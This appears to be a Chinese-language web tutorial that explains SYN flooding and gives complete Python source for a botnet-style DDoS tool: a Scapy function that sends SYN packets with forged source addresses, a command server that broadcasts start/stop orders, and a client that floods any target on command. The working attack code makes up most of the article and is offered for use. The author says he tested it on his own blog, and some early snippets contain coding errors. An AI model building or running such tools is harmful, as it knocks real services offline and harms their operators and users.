Python實(shí)現(xiàn)DDos攻擊實(shí)例詳解
SYN 泛洪攻擊
SYN泛洪攻擊是一種比較常用的Dos方式之一。通過(guò)發(fā)送大量偽造的 TCP 連接請(qǐng)求,使被攻擊主機(jī)資源耗盡(通常是 CPU 滿負(fù)荷或內(nèi)存不足)的攻擊方式
我們都知道建立 TCP 連接需要三次握手。正常情況下客戶端首先向服務(wù)器端發(fā)送SYN報(bào)文,隨后服務(wù)端返回以SYN+ACK報(bào)文,最后客戶端向服務(wù)端發(fā)送ACK報(bào)文完成三次握手
而SYN泛洪攻擊則是客戶端向服務(wù)器發(fā)送SYN報(bào)文之后就不再響應(yīng)服務(wù)器回應(yīng)的報(bào)文。由于服務(wù)器在處理 TCP 請(qǐng)求時(shí),會(huì)在協(xié)議棧留一塊緩沖區(qū)來(lái)存儲(chǔ)握手的過(guò)程,當(dāng)然如果超過(guò)一定時(shí)間內(nèi)沒(méi)有接收到客戶端的報(bào)文,本次連接在協(xié)議棧中存儲(chǔ)的數(shù)據(jù)將會(huì)被丟棄。攻擊者如果利用這段時(shí)間發(fā)送大量的連接請(qǐng)求,全部掛起在半連接狀態(tài)。這樣將不斷消耗服務(wù)器資源,直到拒絕服務(wù)
Scapy3k 基本用法
Scapy3k其實(shí)就是Scapy的 Python3 版本,以下簡(jiǎn)稱Scapy。Scapy是一個(gè)強(qiáng)大的交互式數(shù)據(jù)包處理程序??捎脕?lái)發(fā)送、嗅探、解析和偽造網(wǎng)絡(luò)數(shù)據(jù)包。在網(wǎng)絡(luò)攻擊和滲透測(cè)試重應(yīng)用非常廣泛。Scapy是一個(gè)獨(dú)立的程序同時(shí)還可以作為 Python 的第三方庫(kù)使用
首先安裝Scapy3k,Windows 不方便,下面的操作我都是在 Linux 中進(jìn)行的
sudo pip install scapy
運(yùn)行scapy
sudo scapy
因?yàn)镾capy發(fā)送數(shù)據(jù)包需要root權(quán)限,所以這里加上sudo。另外運(yùn)行的時(shí)候會(huì)出現(xiàn)一些警告信息,因?yàn)闆](méi)有安裝相應(yīng)的依賴包,不過(guò)暫時(shí)用不到,所以不用管
接下來(lái)我們用Scapy構(gòu)造一個(gè)簡(jiǎn)單的數(shù)據(jù)包
pkt = IP(dst = "192.168.50.10")
接下來(lái)構(gòu)造SYN數(shù)據(jù)包,并發(fā)送出去
pkt = IP(src = "125.4.2.1",dst="192.168.50.10")/TCP(dport=80,flags="S") send(pkt)
我們構(gòu)造了一個(gè) IP 包和 TCP 包,并將它們組合到一塊,這樣就有了一個(gè)完整的 TCP 數(shù)據(jù)包,否則是無(wú)法發(fā)送出去的。IP 包中我們指定了源地址src和目的地址dst,其中src是我們偽造的地址,這也是保護(hù)攻擊者的一種方式。flags的值設(shè)定為S,說(shuō)明我們要發(fā)送的是一個(gè)SYN數(shù)據(jù)包。非常簡(jiǎn)單的一段指令就夠早了一個(gè)偽造了源 IP 地址的SYN數(shù)據(jù)包
代碼實(shí)現(xiàn)
現(xiàn)在我們要用 Python 以第三方庫(kù)的形式使用Scapy,使用方法和用交互式 Shell 的方式一樣
前面我們構(gòu)造了SYN數(shù)據(jù)包,現(xiàn)在需要實(shí)現(xiàn)隨機(jī)偽造源 IP 地址、以及不同的源端口向目標(biāo)主機(jī)發(fā)送SYN數(shù)據(jù)包:
import random from scapy.all import * def synFlood(tgt,dPort): srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport = dPort, flags="S") packet = ipLayer / tcpLayer send(packet)
DDos 實(shí)現(xiàn)思路
前面我們已經(jīng)實(shí)現(xiàn)了SYN泛洪攻擊,而DDos則是多臺(tái)主機(jī)一起發(fā)起攻擊,我們只需要能發(fā)送命令,讓連接到服務(wù)器的客戶端一起向同一目標(biāo)發(fā)起攻擊就可以了
世界最大的黑客組織Anonymous經(jīng)常使用LOIC(low Orbit Ion Cannon,滴軌道離子炮)進(jìn)行大規(guī)模的DDos。LOIC有個(gè)HIVEMIND模式,用戶可以通過(guò)連接到一臺(tái) IRC 服務(wù)器,當(dāng)有用戶發(fā)送命令,任何以HIVEMIND模式連接到 IRC 服務(wù)器的成員都會(huì)立即攻擊該目標(biāo)
這種方式的優(yōu)點(diǎn)事不需要傀儡機(jī),可以有很多 "志同道合" 的人一起幫助你實(shí)現(xiàn)DDos,不過(guò)不太適合在傀儡機(jī)中使用。當(dāng)然實(shí)現(xiàn)思路有很多,根據(jù)不同情況的選擇也會(huì)不同。而這里我們將采用客戶端、服務(wù)器的方式來(lái)實(shí)現(xiàn)DDos,這種方式非常簡(jiǎn)單,可擴(kuò)展性也比較強(qiáng)
argparse 模塊
由于 Server 端需要發(fā)送命令去控制 Client 端發(fā)起攻擊,所以這里我們先規(guī)定好命令格式
#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>
-H后面是被攻擊主機(jī)的 IP 地址,-p指定被攻擊的端口號(hào),-c控制攻擊的開(kāi)始與停止
命令制定好了,接下來(lái)看一下如何使用命令解析庫(kù)argparse
# Import argparse package import argparse # New ArgumentParser object parser = argparse.ArgumentParser(description="Process some integers.") # Add parameter parser.add_argument('-p', dest='port', type = int, help = 'An port number!') # Parse command line arguments args = parser.parse_args() print("Port:",args.port)
上面的代碼中,我們創(chuàng)建了一個(gè)ArgumentParser對(duì)象,description參數(shù)是對(duì)命令行解析的一個(gè)描述信息,通常在我們使用-h命令的時(shí)候顯示。add_argument添加我們要解析的參數(shù),這里我們只添加了一個(gè)-p參數(shù),dest是通過(guò)parse_args()函數(shù)返回的對(duì)象中的一個(gè)屬性名稱。type就是解析參數(shù)的類型。help指定的字符串是為了生成幫助信息。argparse默認(rèn)就支持-h參數(shù),只要我們?cè)谔砑訁?shù)的時(shí)候指定help的值就可以生成幫助信息了
socket 模塊
Python 中的socket提供了訪問(wèn) BSDsocket的接口,可以非常方便的實(shí)現(xiàn)網(wǎng)絡(luò)中的信息交換。通常我們使用socket的時(shí)候需要指定ip地址、端口號(hào)、協(xié)議類型。在進(jìn)行socket編程之前我們先了解一下客戶端(Client)和服務(wù)器(Server)的概念。通俗的講,主動(dòng)發(fā)起連接請(qǐng)求的稱為客戶端,監(jiān)聽(tīng)端口響應(yīng)連接的稱為服務(wù)器。下面我寫(xiě)一個(gè)客戶端和服務(wù)器的例子:
客戶端
# Import socket package import socket # Create socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Establish connection s.connect(('192.168.0.100', 7786))
上面這個(gè)例子我們首先導(dǎo)入 socket 庫(kù),然后創(chuàng)建了一個(gè) socket 對(duì)象,socket 對(duì)象中的參數(shù)AF_INET表示我們使用的是 IPV4 協(xié)議,SOCK_STREAM則表示我們使用的是基于流的 TCP 協(xié)議。最后我們指定ip地址和端口號(hào)建立連接
服務(wù)器
# Import socket package import socket cliList = [] # Create socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Specify IP & Port s.bind(('0.0.0.0', 7786)) # Strat monitor s.listen(10) while True: # Receive a new connection sock, addr = s.accept() # Add sock to the list cliList.append(sock)
服務(wù)器的寫(xiě)法比客戶端稍微復(fù)雜一些,在創(chuàng)建完 socket 之后,要綁定一個(gè)地址和端口,這里的0.0.0.0表示綁定到所有的網(wǎng)絡(luò)地址,端口號(hào)只要是沒(méi)被占用的就可以。之后開(kāi)始監(jiān)聽(tīng)端口,并在參數(shù)中指定最大連接數(shù)為 10。最后循環(huán)等待新的連接,并將已連接的 socket 對(duì)象添加到列表中。更多相關(guān)細(xì)節(jié)可以查看 Python 官方文檔
代碼實(shí)現(xiàn)
Server 端
由于 Server 端能等待 Client 主動(dòng)連接,所以我們?cè)?Server 端發(fā)送命令,控制 Client 端發(fā)起SYN泛洪攻擊
在主函數(shù)中我們創(chuàng)建 socket,綁定所有網(wǎng)絡(luò)地址和58868端口并開(kāi)始監(jiān)聽(tīng),之后我們新開(kāi)一個(gè)線程來(lái)等待客戶端的連接,以免阻塞我們輸入命令
def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 58868)) s.listen(1024) t = Thread(target=waitConnect,args(s,)) t.start()
由于我們要給所有客戶端發(fā)送命令,所以我們?cè)谛麻_(kāi)的線程中將連接進(jìn)來(lái)的 socket 添加到一個(gè) list 中,這個(gè)稍后介紹,但在主函數(shù)中我們第一次輸入命令之前需要至少有一個(gè)客戶端鏈接到服務(wù)器,所以這里我判斷了一下socket的長(zhǎng)度
print('Wait at least a client connection!') while not len(socketList): pass print('It has been a client connection!')
現(xiàn)在循環(huán)等待輸入命令,輸入之后判斷命令是否滿足命令格式的基本要求,如果滿足,就把命令發(fā)送給所有客戶端
while True: print("=" * 50) print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start>"') # Wait for input command cmd_str = input('Please input cmd:') if len(cmd_str): if cmd_str[0] == '#': sendCmd(cmd_str)
現(xiàn)在程序的大體框架已經(jīng)有了,接下來(lái)編寫(xiě)主函數(shù)中沒(méi)有完成的子功能。首先我們應(yīng)該實(shí)現(xiàn)等待客戶端的函數(shù),方便開(kāi)啟新的線程
在這個(gè)函數(shù)中,我們只需要循環(huán)等待客戶端的連接就可以,新連接的 socket 要判斷一下是否在 socketList 中已經(jīng)存儲(chǔ)過(guò)了,如果沒(méi)有,就添加到 socketList 中
# wait connection def waitConnect(s): while True: sock, addr = s.accept() if sock not in socketList: socketList.append(socket)
我們?cè)賮?lái)實(shí)現(xiàn)發(fā)送命令的函數(shù),這個(gè)函數(shù)會(huì)遍歷 socketList,將每個(gè) socket 都調(diào)用一次 send 將命令發(fā)送出去
# send command def sendCmd(cmd): print("Send command......") for sock in socketList: sock.send(cmd.encode = ('UTF-8'))
至此我們的Server端就完成了。新建一個(gè)文件,將其命名為ddosSrv.py,向其中添加如下代碼
import socket import argparse from threading import Thread socketList = [] # Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>' # Send command def sendCmd(cmd): print("Send command......") for sock in socketList: sock.send(cmd.encode('UTF-8')) # Wait connect def waitConnect(s): while True: sock, addr = s.accept() if sock not in socketList: socketList.append(sock) def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 58868)) s.listen(1024) t = Thread(target = waitConnect, args = (s, )) t.start() print('Wait at least a client connection!') while not len(socketList): pass print('It has been a client connection!') while True: print('=' * 50) print('The command format:"#-H xxx.xxx.xxx.xxx -p xxx -c <start>"') # Wait for input command cmd_str = input("Please input cmd:") if len(cmd_str): if cmd_str[0] == '#': sendCmd(cmd_str) if __name__ == '__main__': main()
Client 端
我們將在 Client 端實(shí)現(xiàn)對(duì)主機(jī)的SYN泛洪攻擊,并在腳本啟動(dòng)后主動(dòng)連接 Server 端,等待 Server 端發(fā)送命令
在主函數(shù)中我們先創(chuàng)建ArgumentParser()對(duì)象,并將需要解析的命令參數(shù)添加好
def main(): p = argparse.ArgumentParser() p.add_argument('-H', dest = 'host', type = str) p.add_argument('-p', dest = 'port', type = int) p.add_argument('-c', dest = 'cmd', type = str)
現(xiàn)在可以創(chuàng)建 socket,連接服務(wù)器了。這里為了測(cè)試,我們連接到本地的 58868 端口
try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.1', 58868)) print('To connected server was success!') print('=' * 50) cmdHandle(s, p) except: print('The network connected failed!') print('Please restart the script!') sys.exit(0)
我們將接受命令和處理命令定義在一個(gè)單獨(dú)的函數(shù)中。這里我們使用一個(gè)全局變量,用于判斷是否有進(jìn)程正在發(fā)起SYN泛洪攻擊。之后就開(kāi)始循環(huán)接收命令了,接收道德數(shù)據(jù)是byte型,我們需要對(duì)其進(jìn)行解碼,解碼之后才是字符串。如果接收到的數(shù)據(jù)長(zhǎng)度為 0,就跳過(guò)后續(xù)的內(nèi)容,重新接收數(shù)據(jù)
# Process command def cmdHandle(sock, parser): global curProcess while True: # Receive command data = sock.recv(1024).decode('UTF-8') if len(data) == 0: print('The data is empty') continue;
如果數(shù)據(jù)長(zhǎng)度不為 0,就判斷是否具有命令基本格式的特征#,滿足基本條件就需要用ArgumentParser對(duì)象來(lái)解析命令
if data[0] == '#': try: # Parse command options = parser.parse_args(data[1:].split()) m_host = options.host m_port = options.port m_cmd = options.cmd
命令參數(shù)解析出來(lái)后,還需要判斷到底是start命令還是stop命令。如果是start命令,首先要判斷當(dāng)前是否有進(jìn)程在運(yùn)行,如果有進(jìn)程判斷進(jìn)程是否存活。如果當(dāng)前有進(jìn)程正在發(fā)起SYN泛洪攻擊,我們就先結(jié)束這個(gè)進(jìn)程,并清空屏幕,然后再啟動(dòng)一個(gè)進(jìn)程,發(fā)起SYN泛洪攻擊
# DDos start command if m_cmd.lower() == 'start': if curProcess != None and curprocess.is_alive(): # End of process curProcess.terminate() curProcess = None os.system('clear') print('The synFlood is start') p = Process(target = synFlood, args = (m_host, m_port)) p.start() curProcess = p
如果命令是stop,并且有進(jìn)程存活,就直接結(jié)束這個(gè)進(jìn)程,并清空屏幕,否則就什么也不做
# DDos stop command elif m_cmd.lower() == 'stop': if curProcess.is_alive(): curProcess.terminate() os.system('clear') except: print('Failed to perform the command!')
最后,新建一個(gè)文件,命名為ddosCli.py,向其中添加如下代碼
# -*- coding: utf-8 -*- import sys import socket import random import argparse from multiprocessing import Process from scapy.all import * import os isWorking = False curProcess = None # SYN flood attack def synFlood(tgt,dPort): print('='*100) print('The syn flood is running!') print('='*100) srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags="S") packet = ipLayer / tcpLayer send(packet) # Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start>' # Process command def cmdHandle(sock,parser): global curProcess while True: # Receive command data = sock.recv(1024).decode('utf-8') if len(data) == 0: print('The data is empty') return if data[0] == '#': try: # Parse command options = parser.parse_args(data[1:].split()) m_host = options.host m_port = options.port m_cmd = options.cmd # DDos start command if m_cmd.lower() == 'start': if curProcess != None and curProcess.is_alive(): curProcess.terminate() curProcess = None os.system('clear') print('The synFlood is start') p = Process(target=synFlood,args=(m_host,m_port)) p.start() curProcess = p # DDos stop command elif m_cmd.lower() =='stop': if curProcess.is_alive(): curProcess.terminate() os.system('clear') except: print('Failed to perform the command!') def main(): # Add commands that need to be parsed p = argparse.ArgumentParser() p.add_argument('-H', dest='host', type=str) p.add_argument('-p', dest='port', type=int) p.add_argument('-c', dest='cmd', type=str) print("*" * 40) try: # Create socket object s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # Connect to Server s.connect(('127.0.0.1',58868)) print('To connected server was success!') print("=" * 40) # Process command cmdHandle(s,p) except: print('The network connected failed!') print('Please restart the script!') sys.exit(0) if __name__ == '__main__': main()
程序測(cè)試
首先運(yùn)行Server端腳本:
sudo python3 ddosSrv.py
然后再運(yùn)行Client端腳本,一定要用root權(quán)限運(yùn)行
此時(shí)可以看到Client端已經(jīng)提示連接成功了
Server端也提示有一個(gè)客戶端連接了
輸入一個(gè)命令測(cè)試一下,這里我以我自己的博客為目標(biāo)進(jìn)行測(cè)試,各位請(qǐng)遵守網(wǎng)絡(luò)安全法
看到Client端已經(jīng)開(kāi)始發(fā)送數(shù)據(jù)包了,說(shuō)明已經(jīng)發(fā)起了SYN泛洪攻擊
后記
scapy庫(kù)是基于 python2 的,如果是 python3,應(yīng)該使用kamene,詳情可以參考 kamene 官方文檔和 scapy 官方文檔
總結(jié)
以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,如果有疑問(wèn)大家可以留言交流,謝謝大家對(duì)腳本之家的支持。
相關(guān)文章
對(duì)python條件表達(dá)式的四種實(shí)現(xiàn)方法小結(jié)
今天小編就為大家分享一篇對(duì)python條件表達(dá)式的四種實(shí)現(xiàn)方法小結(jié),具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧2019-01-01PyTorch中flatten()?函數(shù)的用法實(shí)例小結(jié)
在PyTorch中,flatten函數(shù)的作用是將一個(gè)多維的張量轉(zhuǎn)換為一維的向量,它可以將任意形狀的張量轉(zhuǎn)換為一維,而不需要指定轉(zhuǎn)換后的大小,這篇文章主要介紹了PyTorch中flatten()?函數(shù)的用法,需要的朋友可以參考下2023-11-11詳解python3中socket套接字的編碼問(wèn)題解決
本篇文章主要介紹了詳解python3中socket套接字的編碼問(wèn)題解決,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2017-07-07python 讀取攝像頭數(shù)據(jù)并保存的實(shí)例
今天小編就為大家分享一篇python 讀取攝像頭數(shù)據(jù)并保存的實(shí)例,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧2018-08-08Python使用xlrd模塊實(shí)現(xiàn)操作Excel讀寫(xiě)的方法匯總
本文介紹Python中使用xlrd、xlwt、xlutils模塊操作Excel文件的方法,xlrd用于讀取Excel文件,但2.0.0版本后不支持.xlsx格式,xlwt用于創(chuàng)建和寫(xiě)入Excel文件,而xlutils主要用于復(fù)制和處理Excel文件,詳細(xì)介紹了如何打開(kāi)文件、獲取工作表信息、操作行列數(shù)據(jù)和處理日期格式數(shù)據(jù)2024-10-10pytest實(shí)現(xiàn)測(cè)試用例參數(shù)化
這篇文章主要介紹了pytest實(shí)現(xiàn)測(cè)試用例參數(shù)化,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2021-04-04Python Flask的request對(duì)象使用詳解
本文介紹Flask request對(duì)象,一個(gè)完整的HTTP請(qǐng)求,包括客戶端向服務(wù)端發(fā)送的Request請(qǐng)求和服務(wù)器端發(fā)送Response響應(yīng).為了能方便訪問(wèn)獲取請(qǐng)求及響應(yīng)報(bào)文信息,Flask框架提供了一些內(nèi)建對(duì)象,下面就來(lái)說(shuō)一下Flask針對(duì)請(qǐng)求提供內(nèi)建對(duì)象reques,需要的朋友可以參考一下2023-02-02